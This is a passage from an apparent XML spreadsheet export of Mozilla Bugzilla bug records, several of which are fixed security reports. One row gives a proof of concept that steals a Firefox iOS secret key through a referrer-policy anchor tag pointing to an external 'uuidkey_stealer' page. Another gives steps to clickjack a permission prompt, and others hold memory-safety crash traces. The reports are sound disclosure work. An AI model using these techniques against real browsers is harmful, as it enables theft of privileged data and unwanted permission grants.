        <is>
          <t>Created attachment 9360413
reader-privilege-escalation.mov
In Firefox for iOS, privileged contents are hosted by internal://local/* URLs, and to prevent access to the internal: pages, secret "uuidkey" based protection was introduced (Bug 1263627). This protection blocks transitions to any internal://local URLs when the correct uuidkey value is not specified in the query string.
If the protection is bypassed, attacker can abuse a XSS bug in sessionrestore page (Bug 1258188) and then any cross origin web contents can be stolen as previously demonstrated (Bug 1279787). So, to prevent leakage of the secret "uuidkey" through the REFERER header, "referrer-policy" are set in some internal: pages.
But, this referrer-policy can be relaxed by overrided it with &lt;a [referrerpolicy]&gt;. For example, if &lt;a referrer-policy=unsafe-url&gt; is set, current full URL with uuidkey is sent to external hyperlink.
In Reader Mode in Firefox for iOS, &lt;a [referrerpolicy]&gt; attributes are not removed when rendering the page in ReaderMode. It allows an attacker to relaxthe referrer policy on the page and steal the correct "uuidkey" value to an external pagevia the REFERER header.
The following page is a demonstration of the above bug.
Open the page in ReaderMode and click a hyperlink with the text "Click Me!!" in the page.
https://csrf.jp/2023/reader-privilege-escalation.php
In the above link, the following &lt;a&gt; tag is set for relaxing the referrer policy.
`&lt;a href=https://csrf.jp/2023/uuidkey_stealer.php referrerpolicy=unsafe-url&gt;Click Me!!&lt;/a&gt;`
When you open the URL in ReaderMode and click the Click Me!!, the page is transitioned to an external page, and "uuidkey" value is stolen through REFERER header. The attacker's external page exploit the XSS bug in sessionrestore page (Bug 1258188), so alert dialog with internal://local is shown in the window.</t>
        </is>
      </c>
      <c r="X1010" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" t="n">
        <v>109530</v>
      </c>
      <c r="B1011" t="inlineStr">
        <is>
          <t>2001-11-10 11:27:48 -0800</t>
        </is>
      </c>
      <c r="C1011" t="inlineStr">
        <is>
          <t>xml.cgi double (and in some cases triple) quoting special characters.</t>
        </is>
      </c>
      <c r="D1011" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E1011" t="n">
        <v>1</v>
      </c>
      <c r="F1011" t="n">
        <v>1</v>
      </c>
      <c r="G1011" t="n">
        <v>4</v>
      </c>
      <c r="H1011" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1011" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1011" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1011" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1011" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1011" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1011" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1011" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1011" t="inlineStr"/>
      <c r="Q1011" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1011" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1011" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1011" t="n">
        <v>1</v>
      </c>
      <c r="U1011" t="n">
        <v>0</v>
      </c>
      <c r="V1011" t="n">
        <v>13</v>
      </c>
      <c r="W1011" t="inlineStr">
        <is>
          <t>This is caused by the fact that Bug.pm runs some fields through QuoteXMLChars()
or html_quote() when it populates its hash and then runs them through
QuoteXMLChars() again when it outputs the XML in emitXML().  Bug.pm's hash of
values should not quote the data in any way.  It should provide "raw" data that
can be quoted depending on the needs of the caller, not just arbitrarily
html/xml quoted.
Also, QuoteXMLChars() has a bug in it in that the order it quotes can cause the
&amp; to get quoted again (making it triple quoted).</t>
        </is>
      </c>
      <c r="X1011" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" t="n">
        <v>1074812</v>
      </c>
      <c r="B1012" t="inlineStr">
        <is>
          <t>2014-09-30 05:48:21 -0700</t>
        </is>
      </c>
      <c r="C1012" t="inlineStr">
        <is>
          <t>[SECURITY] The 'realname' parameter is not correctly filtered on user account creation, leading to user data override</t>
        </is>
      </c>
      <c r="D1012" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:33 -0700</t>
        </is>
      </c>
      <c r="E1012" t="n">
        <v>1</v>
      </c>
      <c r="F1012" t="n">
        <v>1</v>
      </c>
      <c r="G1012" t="n">
        <v>4</v>
      </c>
      <c r="H1012" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1012" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1012" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1012" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L1012" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1012" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1012" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1012" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1012" t="inlineStr">
        <is>
          <t>[blocker will fix]</t>
        </is>
      </c>
      <c r="Q1012" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1012" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1012" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T1012" t="n">
        <v>1</v>
      </c>
      <c r="U1012" t="n">
        <v>0</v>
      </c>
      <c r="V1012" t="n">
        <v>36</v>
      </c>
      <c r="W1012" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Steps to reproduce:
Hello,
My name is Netanel Rubin, I work as a vulnerability researcher at Check Point Software Technologies.
This is a critical vulnerability report for an issue I discovered in the Bugzilla platform. The successful exploitation of the vulnerability allows the manipulation of any DB field at the user creation procedure, including the 'login_name' field. This breaks the email validation process, and allows an attacker to create accounts which match the groups regex policies, effectively becoming a privileged user.
As a PoC, I've created test accounts under bugzilla.mozilla.org:
- admin@mozilla.com
- admin@mozilla.org
- admin@bugzilla.org
- admin@bugzilla.bugs
All of them have 'Admin' as a real name. Please remove these accounts as they were only meant to verify the issue.
We would like to report the complete vulnerability description over a private channel. Please contact us at netanelr@checkpoint.com and shahartal@checkpoint.com (my team leader).
Please assign a CVE number for this issue. We would also like to coordinate the public disclosure with you.
Best regards,
Netanel.
Actual results:
I was able to control every DB field in the user creation process, bypassing email verification.</t>
        </is>
      </c>
      <c r="X1012" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" t="n">
        <v>1737722</v>
      </c>
      <c r="B1013" t="inlineStr">
        <is>
          <t>2021-10-25 18:04:08 -0700</t>
        </is>
      </c>
      <c r="C1013" t="inlineStr">
        <is>
          <t>Redirect Mouse Input to Attacker Controlled Position while Visible Cursor Remain on Original Position</t>
        </is>
      </c>
      <c r="D1013" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:10 -0700</t>
        </is>
      </c>
      <c r="E1013" t="n">
        <v>1</v>
      </c>
      <c r="F1013" t="n">
        <v>1</v>
      </c>
      <c r="G1013" t="n">
        <v>2</v>
      </c>
      <c r="H1013" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1013" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1013" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1013" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1013" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1013" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1013" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1013" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main103+][adv-esr91.12+][adv-esr102.1+]</t>
        </is>
      </c>
      <c r="Q1013" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1013" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1013" t="inlineStr">
        <is>
          <t>104 Branch</t>
        </is>
      </c>
      <c r="T1013" t="n">
        <v>1</v>
      </c>
      <c r="U1013" t="n">
        <v>0</v>
      </c>
      <c r="V1013" t="n">
        <v>37</v>
      </c>
      <c r="W1013" t="inlineStr">
        <is>
          <t>Created attachment 9247667
launcher.zip
After using `overflow-block: hidden` combined with large `transform: scale` surprisingly the mouse input will be redirected to another position (including on Toolbar, Permission panel). I found the redirect click position can be controlled through `scale` number to click "Allow" on the permission panel while the visible cursor position still on the HTML page.
As the testcase using `scale` to redirect the mouse input, the mouse redirect position may different across OS (i.e. not hitting the permission panel), I have adjusted the scale number on the testcase to work (as on PoC video) on the following device (with Fission enabled):
## Tested on:
- Firefox 95.0a1 (2021-10-25) on Arch Linux (X11) (2560x1440) 
- Firefox 95.0a1 (2021-10-25) on Windows 10 (Laptop with 1920x1080 screen and VirtualBox VM with 2560x1440 guest screen)
## Steps to reproduce:
1. Extract attached launcher.zip
2. Visit attached launcher-windows.bundle.html or launcher-kdex11.bundle.html
3. Click "Launch" button
4. Move cursor to "Download" image, the "Allow" button on permission panel will be highlighted
5. While the "Allow" button highlighted
6. Click the "Download" image
7. Location permission is now allowed</t>
        </is>
      </c>
      <c r="X1013" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" t="n">
        <v>600407</v>
      </c>
      <c r="B1014" t="inlineStr">
        <is>
          <t>2010-09-28 17:11:09 -0700</t>
        </is>
      </c>
      <c r="C1014" t="inlineStr">
        <is>
          <t>UI for changing document titles and slugs</t>
        </is>
      </c>
      <c r="D1014" t="inlineStr">
        <is>
          <t>2010-10-12 15:29:00 -0700</t>
        </is>
      </c>
      <c r="E1014" t="n">
        <v>1</v>
      </c>
      <c r="F1014" t="n">
        <v>1</v>
      </c>
      <c r="G1014" t="n">
        <v>5</v>
      </c>
      <c r="H1014" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1014" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1014" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1014" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1014" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1014" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1014" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1014" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1014" t="inlineStr"/>
      <c r="Q1014" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1014" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1014" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T1014" t="n">
        <v>1</v>
      </c>
      <c r="U1014" t="n">
        <v>0</v>
      </c>
      <c r="V1014" t="n">
        <v>9</v>
      </c>
      <c r="W1014" t="inlineStr">
        <is>
          <t>The hard part is done in bug 589947; just hook up the fields.</t>
        </is>
      </c>
      <c r="X1014" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" t="n">
        <v>1193757</v>
      </c>
      <c r="B1015" t="inlineStr">
        <is>
          <t>2015-08-12 07:00:28 -0700</t>
        </is>
      </c>
      <c r="C1015" t="inlineStr">
        <is>
          <t>Crash [@ graphite2::vm::Machine::Code::decoder::emit_opcode]</t>
        </is>
      </c>
      <c r="D1015" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:21 -0700</t>
        </is>
      </c>
      <c r="E1015" t="n">
        <v>1</v>
      </c>
      <c r="F1015" t="n">
        <v>1</v>
      </c>
      <c r="G1015" t="n">
        <v>3</v>
      </c>
      <c r="H1015" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1015" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1015" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K1015" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1015" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1015" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1015" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1015" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1015" t="inlineStr">
        <is>
          <t>sec-high+ without OTS [gfx-noted][adv-main43+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1015" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1015" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1015" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1015" t="n">
        <v>1</v>
      </c>
      <c r="U1015" t="n">
        <v>0</v>
      </c>
      <c r="V1015" t="n">
        <v>7</v>
      </c>
      <c r="W1015" t="inlineStr">
        <is>
          <t>The attached testcase crashes on graphite2 revision fa8d4398dded (run through the gr2fonttest command line utility).
Backtrace:
==11150==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00001f753 at pc 0x7f5d80cf5439 bp 0x7fffe01ccaa0 sp 0x7fffe01cca98
READ of size 1 at 0x61a00001f753 thread T0
    #0 0x7f5d80cf5438 in graphite2::vm::Machine::Code::decoder::emit_opcode(graphite2::vm::opcode, unsigned char const*&amp;) /src/Code.cpp:553
    #1 0x7f5d80cde90a in graphite2::vm::Machine::Code::decoder::load(unsigned char const*, unsigned char const*) /src/Code.cpp:260
    #2 0x7f5d80cde90a in graphite2::vm::Machine::Code::Code(bool, unsigned char const*, unsigned char const*, unsigned char, unsigned short, graphite2::Silf const&amp;, graphite2::Face const&amp;, graphite2::passtype, unsigned char*&amp;) /src/Code.cpp:194
    #3 0x7f5d80d5bf0c in graphite2::Pass::readRules(unsigned char const*, unsigned long, unsigned char const*, unsigned short const*, unsigned short const*, unsigned char const*, unsigned short const*, unsigned char const*, graphite2::Face&amp;, graphite2::passtype, graphite2::Error&amp;) /src/Pass.cpp:238
    #4 0x7f5d80d5999c in graphite2::Pass::readPass(unsigned char const*, unsigned long, unsigned long, graphite2::Face&amp;, graphite2::passtype, unsigned int, graphite2::Error&amp;) /src/Pass.cpp:183
    #5 0x7f5d80d88b62 in graphite2::Silf::readGraphite(unsigned char const*, unsigned long, graphite2::Face&amp;, unsigned int) /src/Silf.cpp:212
    #6 0x7f5d80d1cfb8 in graphite2::Face::readGraphite(graphite2::Face::Table const&amp;) /src/Face.cpp:149
    #7 0x7f5d80cb8bef in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) /src/gr_face.cpp:59
    #8 0x7f5d80cbbf79 in gr_make_face_with_ops /src/gr_face.cpp:89
    #9 0x7f5d80cbbf79 in gr_make_file_face /src/gr_face.cpp:242
    #10 0x48ed05 in Parameters::testFileFont() const /gr2fonttest/gr2FontTest.cpp:618
    #11 0x49248b in main /gr2fonttest/gr2FontTest.cpp:770
    #12 0x7f5d808f9ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #13 0x486c4c in _start (/build/gr2fonttest/gr2fonttest+0x486c4c)
0x61a00001f753 is located 0 bytes to the right of 1235-byte region [0x61a00001f280,0x61a00001f753)
allocated by thread T0 here:
    #0 0x46df61 in __interceptor_malloc (/build/gr2fonttest/gr2fonttest+0x46df61)
    #1 0x7f5d80dadbfe in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) /src/FileFace.cpp:90
    #2 0x7f5d80d1f79f in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) /src/Face.cpp:274
    #3 0x7f5d80cb88e7 in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) /src/gr_face.cpp:49
    #4 0x7f5d80cbbf79 in gr_make_face_with_ops /src/gr_face.cpp:89
    #5 0x7f5d80cbbf79 in gr_make_file_face /src/gr_face.cpp:242
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/Code.cpp:553 graphite2::vm::Machine::Code::decoder::emit_opcode(graphite2::vm::opcode, unsigned char const*&amp;)
Shadow bytes around the buggy address:
  0x0c347fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c347fffbee0: 00 00 00 00 00 00 00 00 00 00[03]fa fa fa fa fa
  0x0c347fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf3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11150==ABORTING
Note that this is on graphite2 trunk and without OTS in front of it. We tested this particular file and Firefox and it is rejected by OTS with the message:
"Sill: table overruns end of file"
However, according to cdiehl that doesn't necessarily mean that the bug cannot be reached through OTS (e.g. by fixing up the testcase enough to make it through). Marking s-s until we confirmed that this bug cannot be reached/exploited with OTS enabled.</t>
        </is>
      </c>
      <c r="X1015" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" t="n">
        <v>1020899</v>
      </c>
      <c r="B1016" t="inlineStr">
        <is>
          <t>2014-06-05 03:23:50 -0700</t>
        </is>
      </c>
      <c r="C1016" t="inlineStr">
        <is>
          <t>Deploy the msisdn server to stage</t>
        </is>
      </c>
      <c r="D1016" t="inlineStr">
        <is>
          <t>2014-07-07 15:15:31 -0700</t>
        </is>
      </c>
      <c r="E1016" t="n">
        <v>1</v>
      </c>
      <c r="F1016" t="n">
        <v>1</v>
      </c>
      <c r="G1016" t="n">
        <v>2</v>
      </c>
      <c r="H1016" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1016" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J1016" t="inlineStr">
        <is>
          <t>Operations: Deployment Requests - DEPRECATED</t>
        </is>
      </c>
      <c r="K1016" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1016" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1016" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1016" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1016" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1016" t="inlineStr">
        <is>
          <t>[qa+]</t>
        </is>
      </c>
      <c r="Q1016" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1016" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1016" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1016" t="n">
        <v>1</v>
      </c>
      <c r="U1016" t="n">
        <v>0</v>
      </c>
      <c r="V1016" t="n">
        <v>83</v>
      </c>
      <c r="W1016" t="inlineStr">
        <is>
          <t>Please puppetize/deploy msisdn on aws 
the repo is at : https://github.com/mozilla-services/msisdn-gateway
There's a deployed aws dev. Rémy is the main contact.
Thanks!</t>
        </is>
      </c>
      <c r="X1016" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" t="n">
        <v>1730156</v>
      </c>
      <c r="B1017" t="inlineStr">
        <is>
          <t>2021-09-10 06:15:12 -0700</t>
        </is>
      </c>
      <c r="C1017" t="inlineStr">
        <is>
          <t>AddressSanitizer: SEGV on unknown address in mozilla::dom::Directory::GetFullRealPath(nsTSubstring&lt;char16_t&gt;&amp;) -&gt; operator-&gt; get</t>
        </is>
      </c>
      <c r="D1017" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:30 -0700</t>
        </is>
      </c>
      <c r="E1017" t="n">
        <v>1</v>
      </c>
      <c r="F1017" t="n">
        <v>1</v>
      </c>
      <c r="G1017" t="n">
        <v>3</v>
      </c>
      <c r="H1017" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1017" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1017" t="inlineStr">
        <is>
          <t>DOM: File</t>
        </is>
      </c>
      <c r="K1017" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1017" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1017" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1017" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1017" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1017" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][sec-survey][adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q1017" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1017" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1017" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T1017" t="n">
        <v>1</v>
      </c>
      <c r="U1017" t="n">
        <v>0</v>
      </c>
      <c r="V1017" t="n">
        <v>44</v>
      </c>
      <c r="W1017" t="inlineStr">
        <is>
          <t>Created attachment 9240529
testcase.html
When using `&lt;input type="file"&gt;` then set attribute `webkitdirectory` to `true` then repeatedly reload the page with form submit or `location.reload()`. When page reload while holding down "Enter" key after file select dialog appears then select file, the tab crashes with `AddressSanitizer: SEGV on unknown address in mozilla::dom::Directory::GetFullRealPath -&gt; operator-&gt; get`
After holding down the "Enter" key, the file dialog still allow to choose file even set `webkitdirectory` to `true`. I think the HTMLInputElement still refer to previous pointer, one of the crash address on Windows 10 show e5e5e5e5 (probably uaf?)
When testing this on Firefox ASan 64-bit on Linux it shows `AddressSanitizer: SEGV on unknown address with Hint: this fault was caused by a dereference of a high value address (see register values below)` on Firefox ASan 32-bit it shows the address `SEGV address on unknown address 0x270edfe3` (same address every-time I tried the testcase)
## Steps to reproduce:
1. Visit attached testcase.html
2. Hold down "Enter" key
3. After file open dialog appears, then select file
4. Click "Open" or press "Enter" key
5. The tab crashed
## ASan output:
```
=================================================================
==1971273==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7f8aa549f80f bp 0x7fff19db80f0 sp 0x7fff19db80f0 T0)
==1971273==The signal is caused by a READ memory access.
==1971273==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x7f8aa549f80f in get /home/sourc7/git/gecko-dev-asan/objdir-ff-asan/dist/include/nsCOMPtr.h:851:48
    #1 0x7f8aa549f80f in operator-&gt; /home/sourc7/git/gecko-dev-asan/objdir-ff-asan/dist/include/nsCOMPtr.h:872:12
    #2 0x7f8aa549f80f in mozilla::dom::Directory::GetFullRealPath(nsTSubstring&lt;char16_t&gt;&amp;) /home/sourc7/git/gecko-dev-asan/dom/filesystem/Directory.cpp:133:17
    #3 0x7f8aa55f00be in GetDOMFileOrDirectoryPath /home/sourc7/git/gecko-dev-asan/dom/html/HTMLInputElement.cpp:433:29
    #4 0x7f8aa55f00be in mozilla::dom::HTMLInputElement::AfterSetFilesOrDirectories(bool) /home/sourc7/git/gecko-dev-asan/dom/html/HTMLInputElement.cpp:2511:5
    #5 0x7f8aa561e661 in mozilla::dom::DispatchChangeEventCallback::Callback(nsresult, FallibleTArray&lt;RefPtr&lt;mozilla::dom::BlobImpl&gt; &gt; const&amp;) /home/sourc7/git/gecko-dev-asan/dom/html/HTMLInputElement.cpp:234:20
    #6 0x7f8aa55c9ccb in mozilla::dom::HTMLInputElement::nsFilePickerShownCallback::Done(short) /home/sourc7/git/gecko-dev-asan/dom/html/HTMLInputElement.cpp:559:13
    #7 0x7f8aa7bb8e9f in nsFilePickerProxy::Recv__delete__(mozilla::dom::MaybeInputData const&amp;, short const&amp;) /home/sourc7/git/gecko-dev-asan/widget/nsFilePickerProxy.cpp:191:16
    #8 0x7f8a9fe561f3 in mozilla::dom::PFilePickerChild::OnMessageReceived(IPC::Message const&amp;) /home/sourc7/git/gecko-dev-asan/objdir-ff-asan/ipc/ipdl/PFilePickerChild.cpp:186:28
    #9 0x7f8a9fc441e5 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /home/sourc7/git/gecko-dev-asan/objdir-ff-asan/ipc/ipdl/PContentChild.cpp:8336:32
    #10 0x7f8a9f96b45c in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:2051:25
    #11 0x7f8a9f967af6 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:1978:9
    #12 0x7f8a9f96997a in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:1826:3
    #13 0x7f8a9f96a2c1 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/sourc7/git/gecko-dev-asan/ipc/glue/MessageChannel.cpp:1857:13
    #14 0x7f8a9e39ad5a in mozilla::RunnableTask::Run() /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:502:16
    #15 0x7f8a9e35640f in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:805:26
    #16 0x7f8a9e352c88 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:641:15
    #17 0x7f8a9e353358 in mozilla::TaskController::ProcessPendingMTTask(bool) /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:425:36
    #18 0x7f8a9e38f361 in operator() /home/sourc7/git/gecko-dev-asan/xpcom/threads/TaskController.cpp:135:37
    #19 0x7f8a9e38f361 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /home/sourc7/git/gecko-dev-asan/xpcom/threads/nsThreadUtils.h:532:5
    #20 0x7f8a9e37599b in nsThread::ProcessNextEvent(bool, bool*) /home/sourc7/git/gecko-dev-asan/xpcom/threads/nsThread.cpp:1148:16
    #21 0x7f8a9e381e81 in NS_ProcessNextEvent(nsIThread*, bool) /home/sourc7/git/gecko-dev-asan/xpcom/threads/nsThreadUtils.cpp:466:10
    #22 0x7f8a9f974907 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/sourc7/git/gecko-dev-asan/ipc/glue/MessagePump.cpp:85:21
    #23 0x7f8a9f7d6741 in RunInternal /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:331:10
    #24 0x7f8a9f7d6741 in RunHandler /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:324:3
    #25 0x7f8a9f7d6741 in MessageLoop::Run() /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:306:3
    #26 0x7f8aa7ba9c3a in nsBaseAppShell::Run() /home/sourc7/git/gecko-dev-asan/widget/nsBaseAppShell.cpp:137:27
    #27 0x7f8aac8c8a5f in XRE_RunAppShell() /home/sourc7/git/gecko-dev-asan/toolkit/xre/nsEmbedFunctions.cpp:923:20
    #28 0x7f8a9f7d6741 in RunInternal /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:331:10
    #29 0x7f8a9f7d6741 in RunHandler /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:324:3
    #30 0x7f8a9f7d6741 in MessageLoop::Run() /home/sourc7/git/gecko-dev-asan/ipc/chromium/src/base/message_loop.cc:306:3
    #31 0x7f8aac8c7908 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/sourc7/git/gecko-dev-asan/toolkit/xre/nsEmbedFunctions.cpp:755:34
    #32 0x55e150df0b2c in content_process_main /home/sourc7/git/gecko-dev-asan/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
